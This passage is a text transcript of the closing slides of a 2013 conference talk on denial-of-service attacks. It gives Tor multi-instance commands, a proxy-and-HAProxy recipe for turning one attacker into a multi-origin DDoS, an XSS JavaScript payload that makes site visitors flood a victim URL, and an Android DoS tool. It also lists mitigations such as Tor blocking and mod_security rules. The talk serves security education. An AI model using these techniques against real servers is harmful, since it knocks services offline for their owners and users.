    • 68. Proxies and Layer 7 attacks Bônus: Multi-TOR The TOR client supports spawning as many instances and opening as many circuits as necessary. tor ­­RunAsDaemon 1 ­­CookieAuthentication 0  ­­HashedControlPassword "pwd" ­­ControlPort 4444  ­­PidFile torN.pid ­­SocksPort 5090 ­­DataDirectory  data/torN Tool: Multi-TOR https://github.com/jseidl/Multi-TOR/ EX: ./multi-tor.sh 5 # Opens 5 TOR instances Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 69. Proxies and Layer 7 attacks Mitigating TOR with TORBlock Blocking TOR-sourced access TORBlock: IPTables-based blocking Tool: https://github.com/jseidl/torblock Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 70. Load Balancing Attacks Meet Jericho Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 71. Load Balancing Attacks Starring: HAProxy “The Reliable, High Performance TCP/HTTP Load Balancer” REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C } Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 72. Load Balancing Attacks 'Load-balanced' attacks anatomy Attacker: 1. Open lots of socat tunnels to the victim, each one from a different proxy (regular, TOR or both) 2. Put local port addresses (socat'ed ones) on HAProxy 3. Place victim's domain on /etc/hosts 4. Attack normally from your favorite tool Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 73. Load Balancing Attacks 'Load-balanced' attacks anatomy listen ddos 0.0.0.0:80 mode tcp balance roundrobin server inst1 localhost:8080 server inst2 localhost:8081 server inst3 localhost:8082 server inst4 localhost:8083 … Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 74. Load Balancing Attacks 'Load-balanced' attacks anatomy Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 75. Load Balancing Attacks 'Load-balanced' attacks anatomy Proxy 1 Proxy 2 Attacker HAProxy Proxy 3 Proxy 4 Victim Proxy 5 Proxy 6 Proxy 7 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 76. Load Balancing Attacks 'Load-balanced' attacks anatomy Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 77. Load Balancing Attacks Dangers of 'load-balanced' attacks? ● ● Bypass connection-limiting ● ● ● ● ● ● DoS → DDoS Mutiple origin IPs Origins can be from multiple countries Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 78. Load Balancing Attacks Dangers of 'load-balanced' attacks? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 79. Load Balancing Attacks More about the Jericho Attack Technique http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 80. XSS D/DoS What if an XSS flaw could turn your visitors into D/DoS clients? <script> function DDoS() { a = new Date() unixepoch = a.getTime() } elm = document.createElement("img") victimURL = "http://10.1.1.114/" elm.src = victimURL+"?"+unixepoch setInterval("DDoS()",1); </script> Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 81. Mobile-launched Denial-of-Service PoC Tool: GoldenEye Mobile Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 82. Mobile-launched Denial-of-Service Objective Test if mobile devices alone could conduct a successful DoS attack. Test if equipment and configurations are able to deter DoS attacks from mobile platforms. Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 83. Mobile-launched Denial-of-Service Android: Limitations Max 128 threads (Android 2.1) Maximum number of concurrent sockets per thread: 30 (>30 too many open files) Can we get better results if device is 'rooted' (sysctl) ? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 84. Mobile-launched Denial-of-Service Firepower 5 min test on an Apache webserver, default configuration, in a Debian 6 virtual machine, also with default configuration. CPU Usage: u5.85 s4.52 cu0 cs0 ­ 2.37% CPU  load Low CPU fingerprint Server overloaded  (a.k.a. down) https://github.com/jseidl/GoldenEye-Mobile Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 85. Mobile-launched Denial-of-Service GoldenEye Mobile: Mitigation GoldenEye Mobile uses HEAD method for maximum speed. Easily blocked (Module: Mod_Rewrite) RewriteEngine on RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$  RewriteRule .* ­ [F] mod_security SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405" Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 86. Demo: DoS Fun GoldenEye Mobile DoS Android Tool Demo! http://bit.ly/GoldenEyeMDOS Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 87. Questions? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 88. Thanks! – To Peace! Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 89. Thanks! Thanks for your time! jseidl@wroot.org / http://wroot.org https://github.com/jseidl http://www.slideshare.net/jseidl @jseidl Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil

    ×